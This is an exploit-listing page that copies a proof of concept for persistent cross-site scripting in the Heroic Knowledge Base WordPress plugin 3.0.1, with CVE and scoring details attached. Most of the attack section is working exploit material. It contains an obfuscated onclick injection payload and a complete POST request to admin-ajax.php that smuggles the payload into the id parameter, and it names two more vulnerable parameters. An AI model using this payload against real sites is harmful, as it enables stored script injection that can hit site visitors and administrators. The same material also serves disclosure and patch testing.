Advertisement






Heroic Knowledge Base 3.0.1 Cross Site Scripting

CVE Category Price Severity
CVE-2021-40811 CWE-79 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-11-28
CPE
cpe:cpe:/a:heroic:knowledge_base:3.0.1
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02183 0.37043

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110227

Below is a copy:

Heroic Knowledge Base 3.0.1 Cross Site Scripting
#Exploit Title : Heroic Knowledge Base Plugin  <= 3.0.1 - Persistent Cross Site Scripting 
#Exploit Author : begininvoke
#Exploit Date : 2020-11-27
#Vendor Homepage : https://herothemes.com



[+] Proof Of Concept:
=====================

# HTML Code #

<div class="ht-voting" id ="ht-voting-post-\"/**/(/* */oNcliCk=alert(1399) )//">

# Methode POST #

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://site.com/knowledge-base/research-strategy-development-roadmap-rsdr/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close

action=ht_voting&direction=up&type=post&nonce=6d2ea5db0f&id="/**/(/* */oNcliCk=alert(1399) )//&allow=anon&display=standard


Parameters allow & display are also vulnerable

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum